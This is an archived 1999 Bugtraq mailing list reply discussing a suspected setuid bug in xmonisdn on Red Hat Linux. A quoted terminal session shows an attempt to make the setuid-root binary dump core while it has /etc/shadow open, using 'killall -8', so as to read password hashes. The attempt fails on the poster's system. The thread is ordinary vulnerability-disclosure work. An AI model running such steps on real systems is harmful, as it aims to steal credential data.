Bugtraq mailing list archives

Re: xmonisdn (isdn4k-utils/Linux) bug report


From: ronvdaal () SYNTONIC NET (Ron van Daal)
Date: Wed, 20 Oct 1999 14:40:43 +0200


Hi Jan-Hendrik,

That's the behaviour I would expect from xmonisdn. A setuid binary
shouldn't dump core if it's being executed by a user which doesn't
match the ownership of the binary. Therefore I think there are two
problems: 1) (small) bug in xmonisdn 2) a bug in my Linux system.

The problem appeared on my desktop system (RedHat kernel 2.2.5-15),
but I couldn't reproduce it on one of my other Linux systems (using
kernels 2.0.36 and 2.2.12-OpenWall).

--
Ron van Daal          | Syntonic Internet | tel. +31(0)46-4230738
ronvdaal () syntonic net | www.syntonic.net  | fax. +31(0)46-4230739

On Wed, 20 Oct 1999, Jan-Hendrik Terstegge wrote:

On Tue, 19 Oct 1999 Ron wrote:

While playing with xmonisdn (included in the isdn4k-utils package),
I discovered a little bug. I didn't find anything regarding xmonisdn
in the Bugtraq archives, so here's a quick post.
I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)
[... exploit ...]

I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2, but it
seems as if it was a RedHat Linux-only exploit.
This was my attempt to exploit it myself. When I make the 'killall -8 xmonisdn' my
xmonisdn dies only with a Floating exception but it doesn't dump a core.

---snip---
[pts/> [pts/0@tatooine] /usr/bin > pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x    1       root    root    15340   Jul 23 01:20 xmonisdn
[pts/> [pts/0@tatooine] /usr/bin > xmonisdn -file /etc/shadow

[1]  +   Stopped                      xmonisdn -file /etc/shadow
[pts/> [pts/0@tatooine] /usr/bin > bg
[1]     xmonisdn -file /etc/shadow &
[pts/> [pts/0@tatooine] /usr/bin > killall -8 xmonisdn
[1]     Floating exception            xmonisdn -file /etc/shadow
[pts/> [pts/0@tatooine] /usr/bin > strings core |less
strings: core: File or Directory not found
---snip---


--
Jan-Hendrik Terstegge
<sysadmin () tatooine ping de>



